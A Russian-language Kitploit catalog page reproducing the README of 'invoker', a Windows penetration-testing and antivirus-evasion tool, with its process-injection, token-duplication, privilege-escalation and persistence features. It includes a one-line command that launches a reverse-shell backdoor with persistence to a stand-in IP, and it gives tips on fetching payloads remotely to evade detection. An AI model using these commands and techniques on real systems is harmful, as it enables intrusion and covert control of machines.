Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
invoker — Утилита для тестирования на проникновение и оценки антивирусов. | Kitploit
Инструменты/GitHubGitHub/ivan-sincek/invoker
Повышение привилегийКриминалистика памятиЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеАнализ Бинарных ФайловОбучение и ОбразованиеRed TeamingРазработка Полезной НагрузкиArchived
GitHubivan-sincek/invoker

invoker

31282223 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Утилита для тестирования на проникновение и оценки антивирусов.

Репозиторий

Invoker

Утилита для тестирования на проникновение и оценки антивирусов.

Собрана с помощью Visual Studio Community 2022 v17.5.4 (64-bit) и протестирована на Windows 10 Enterprise OS (64-bit).

Сделано в образовательных целях. Надеюсь, это поможет!

Этот репозиторий начал собирать известные сигнатуры, и у меня нет времени каждый раз загружать новые исполняемые файлы, поэтому вам следует скомпилировать этот проект самостоятельно.

Полезные сайты:

  • elastic.co
  • learn.microsoft.com
  • processhacker.sourceforge.io
  • undocumented.ntinternals.net
  • pinvoke.net

Что нужно сделать:

  • сделать process ghosting совместимым с x86 архитектурой, так как NtCreateProcessEx плохо работает с 32-битными процессами.

Планы на будущее:

  • hollowing процесса,
  • doppelgänging процесса,
  • herpaderping процесса,
  • ghosting процесса,
  • больше вызовов проксирования DLL,
  • перехват COM,
  • скрипт Python3 для статической обфускации всего исходного кода.

Что я учитываю при кодировании:

  • упрощать всё,
  • использовать динамические выделения вместо статических, (иногда)
  • использовать минимально необходимые права доступа и флаги управления,
  • обрабатывать/перехватывать возможные ошибки/исключения,
  • обнулять и освобождать массивы и память после использования,
  • корректно закрывать открытые дескрипторы/потоки после использования,
  • уменьшать счетчик ссылок библиотек, объектов и т.п. после использования,
  • вызывать сборщик мусора перед выходом. (не применимо)

Все вышеперечисленное приведет к тому, что ваш PE будет иметь меньший размер и меньший процент обнаружения.

Содержание

  • Библиотека Invoker
  • Как запустить
  • Внедрение байт-кода
  • Генерация полезной нагрузки реверс-шелла
  • PowerShell
  • Прямые системные вызовы
  • Создание DLL с процедурой-перехватчиком
  • Получение учетной записи LocalSystem (NT AUTHORITY\SYSTEM)
  • Изображения

Библиотека Invoker

Возможности:

  • вызывать системные оболочки,
  • совершать прямые системные вызовы,
  • использовать Windows Management Instrumentation (WMI),
  • подключаться к удаленному хосту,
  • завершать запущенный процесс,
  • запускать новый процесс,
  • дампить память процесса,
  • манипулировать исполняемым образом процесса,
  • внедрять байт-код в процесс,
  • внедрять DLL в процесс,
  • выводить список загруженных DLL процесса,
  • вызывать перехват DLL,
  • устанавливать процедуру-перехватчик,
  • включать привилегии маркера доступа,
  • дублировать маркер доступа процесса и запускать новый процесс,
  • скачивать файл,
  • добавлять/редактировать ключ реестра,
  • планировать задачу,
  • выводить список путей служб без кавычек и запускать, останавливать или перезапускать службу,
  • заменять несколько файлов System32.

Проверьте библиотеку Invoker здесь. Не стесняйтесь использовать её!


Некоторые функции могут требовать прав администратора.

Некоторые функции могут не работать на Windows XP и более ранних версиях из-за используемых специфических прав доступа и флагов управления.

Как запустить

Запустите Invoker_x86.exe (32-бит) или Invoker_x64.exe (64-бит).

Чтобы автоматизировать бэкдор реверс-шелла с добавлением постоянства, выполните следующую команду:

Invoker_x64.exe 192.168.8.5:9000

32-битный Invoker может:

  • совершать прямые системные вызовы,
  • дампить память 32-битного процесса,
  • манипулировать и внедрять исполняемый образ 32-битного процесса в 32-битный процесс,
  • манипулировать и внедрять исполняемый образ 64-битного процесса в 64-битный процесс,
  • внедрять 32-битный байт-код в 32-битный процесс,
  • внедрять 32-битную DLL в 32-битный процесс,
  • выводить список загруженных DLL 32-битного процесса,
  • устанавливать процедуру-перехватчик из 32-битной DLL.

64-битный Invoker может:

  • совершать прямые системные вызовы,
  • дампить память 32-битного процесса,
  • дампить память 64-битного процесса,
  • манипулировать и внедрять исполняемый образ 32-битного процесса в 32-битный процесс,
  • манипулировать и внедрять исполняемый образ 64-битного процесса в 64-битный процесс,
  • внедрять 32-битный байт-код в 32-битный процесс,
  • внедрять 64-битный байт-код в 64-битный процесс,
  • внедрять 32-битную DLL в 32-битный процесс,
  • внедрять 64-битную DLL в 64-битный процесс,
  • выводить список загруженных DLL 32-битного процесса,
  • выводить список загруженных DLL 64-битного процесса,
  • устанавливать процедуру-перехватчик из 32-битной DLL,
  • устанавливать процедуру-перехватчик из 64-битной DLL.

Обратите внимание, что каждая техника внедрения имеет как плюсы, так и минусы; например, некоторым техникам требуется меньше прав доступа, они используют менее подозрительные методы и т.д., но могут, например, привести к краху процесса, требовать времени и других особых условий для выполнения полезной нагрузки и т.д.

Обратите внимание, что некоторые C2C-импланты могут не работать после освобождения памяти. В этом случае закомментируйте методы, такие как VirtualFreeEx, NtFreeVirtualMemory и т.д.

Внедрение байт-кода

Повысьте привилегии, внедрив байт-код в процесс с более высокими привилегиями.

Этот инструмент может загрузить содержимое бинарного файла в память и внедрить его в запущенный процесс. Он также может анализировать HTTP-ответ и извлекать полезную нагрузку из пользовательского элемента, например, из <invoker>payload</invoker>, где payload — это бинарный код, закодированный в Base64.

Проверьте пример на pastebin.com/raw/xf9Trt0d.

Это полезно, если антивирус постоянно удаляет ваши локальные полезные нагрузки.

Проверьте дополнительный пример на pastebin.com/raw/iW17rCxH — полезная нагрузка, скрытая в элементе изображения.

P.S. Предоставленные байт-коды, скорее всего, не будут работать у вас.

Используйте ngrok, чтобы предоставить вашему локальному веб-серверу публичный адрес.


Чтобы узнать, является ли процесс 32-битным или 64-битным, откройте Диспетчер задач -> нажмите Подробнее -> перейдите на вкладку Сведения -> щелкните правой кнопкой мыши по любому столбцу -> выберите Выбрать столбцы -> отметьте флажок Платформа.

Чтобы узнать, запущен ли процесс с правами администратора, отметьте флажок Повышенный.

Генерация полезной нагрузки реверс-шелла

Узнайте, как сгенерировать полезную нагрузку реверс-шелла из моего другого проекта, а также как настроить прослушиватели Ncat и multi/handler.

Внедрение байт-кода может завершиться неудачей, поскольку байт-код может содержать плохие символы, неправильную функцию выхода или кодировку; внедрение DLL более надежно.

PowerShell

Если вы хотите запустить реверс- или бинд-шелл PowerShell из Invoker, откройте Invoker и запустите сеанс PowerShell, затем выполните любой из однострочников (из моего другого проекта).

Прямые системные вызовы

Библиотека прямых системных вызовов и ассемблер были сгенерированы с помощью SysWhispers2. Автору спасибо!

Скачать инструмент